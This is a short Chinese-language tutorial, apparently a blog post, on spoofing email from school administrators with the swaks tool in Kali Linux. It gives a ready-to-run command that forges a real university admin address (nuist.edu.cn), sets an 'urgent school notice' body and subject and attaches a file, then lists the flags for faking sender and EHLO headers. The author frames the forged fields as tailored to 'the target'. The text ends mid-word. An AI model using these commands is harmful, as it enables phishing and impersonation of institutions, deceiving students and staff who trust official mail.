伪装成学校管理员发邮件？9成学校都存在

大多数学校的邮箱都可以使用代发服务（经过测试，绝大多数学校都存在这种问题）

使用方式，我们使用kali Linux中的swaks工具

目前接收邮件的测试邮箱163邮箱，qq邮箱因为安全限制问题无法接收到

具体命令：

swaks --body "学校紧急通知" --header "Subject:教务处" -t baianquanzu@163.com -f admin@nuist.edu.cn --attach post.txt

body参数是发送过去邮件的内容

header是发送过去邮件的标题

-t是我们的目标邮箱

-f是发送者的邮箱

--attach是指定要附加的文件的路径

详细参数介绍

--from <要显示的发件人邮箱>

--ehlo <伪造的邮件ehlo头>

--body <邮件正文>

--header <邮件头信息，subject为邮件标题>

--data <源邮件>

可以看到上放的发件人是学校的邮箱，标题等，根据我们对目标的需求进行伪造，只不过下方的附件会被统一变成一个网易邮箱的文件b